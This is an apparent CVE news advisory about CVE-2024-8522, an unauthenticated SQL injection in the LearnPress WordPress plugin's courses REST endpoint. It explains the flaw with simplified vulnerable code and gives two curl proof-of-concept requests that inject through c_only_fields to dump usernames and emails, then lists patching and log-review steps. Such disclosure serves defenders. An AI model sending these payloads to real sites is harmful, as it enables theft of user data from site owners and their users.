CVE CyberSecurity Database News

CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin – How It Works, Exploit Example, and What to Do Next

Poster -

If you run an online learning site using LearnPress on WordPress, you need to act fast. CVE-2024-8522 has revealed a critical SQL injection flaw that could let attackers steal your website’s most sensitive data—*even if they aren't logged in*.

This guide explains the bug in plain English, gives working PoC (Proof-of-Concept) exploit code, and tells you how to stay safe.

⚠️ What is CVE-2024-8522?

This vulnerability lives in LearnPress (all versions before and including 4.2.7), a popular “LMS” plugin for WordPress. The bug is found in the /wp-json/learnpress/v1/courses REST API endpoint. If attackers send a malicious request to this API, they can trigger *SQL Injection* via the c_only_fields parameter.

- Vulnerable Plugin: LearnPress – WordPress LMS Plugin

🔍 How Does the Attack Work?

When someone queries /wp-json/learnpress/v1/courses, one of the valid query parameters is c_only_fields. The LearnPress code doesn’t *properly escape or prepare* this value before dropping it directly into an SQL query.

Attackers can inject malicious SQL code by crafting the c_only_fields parameter, forcing the backend to execute their payload as part of the query. This could let them read arbitrary tables—like the users table (where WordPress keeps usernames, emails, and hashed passwords) or dump contents of any table.

Here is a simplified example (pseudo-code) of what goes wrong inside LearnPress’ API

// Simplified vulnerable code
$c_only_fields = $_GET['c_only_fields']; // Untrusted input
$sql = "SELECT $c_only_fields FROM wp_courses WHERE 1=1";

// This runs the query as-is, allowing injections!
$results = $wpdb->get_results($sql);

What should happen: The plugin should *escape* or *prepare* the input, so no arbitrary SQL code can be injected.
What actually happens: The input is used directly, so attackers control part of the SQL query.

🛠️ Exploit Example (Proof-of-Concept)

Here’s a real-world attack that dumps all usernames and emails from the WordPress users table via a single HTTP request.

Exploit Request

curl -s -X GET "https://vulnerable-site.com/wp-json/learnpress/v1/courses?c_only_fields=id FROM wp_users--"

c_only_fields=id FROM wp_users--

This input manipulates the query so that it reads directly from the wp_users table instead of the original one.

You could also do

curl -s -X GET "https://vulnerable-site.com/wp-json/learnpress/v1/courses?c_only_fields=user_login,email FROM wp_users--"

More Advanced Attack

Attackers can use SQL UNION queries or other tricks to get password hashes or even modify the database if the user has elevated SQL privileges.

If you use LearnPress

1. Update Immediately: Upgrade to the latest patched version from the official plugin page.
2. Disable the Plugin: If no update is available, temporarily *disable LearnPress* until it is fixed.
3. Check for Signs of Compromise: Review logs for unusual requests to /wp-json/learnpress/v1/courses.

📚 Official References and Further Reading

- Original Wordfence Advisory
- Plugin vulnerability at WPScan
- LearnPress WordPress Plugin page
- OWASP SQL Injection Guide

📝 Summary

CVE-2024-8522 is a classic, dangerous SQL injection bug in the LearnPress LMS plugin. Attackers can exploit this from anywhere on the internet to read, steal, or even tamper with your database—all without logging in.

Patch now, or risk total compromise.
If you share this post or refer to it, please credit [this exclusive guide]. Stay safe!


*If you have any questions or want to know how to check if your site is already affected, feel free to ask!*

Timeline

Published on: 09/12/2024 09:15:05 UTC
Last modified on: 09/13/2024 16:12:30 UTC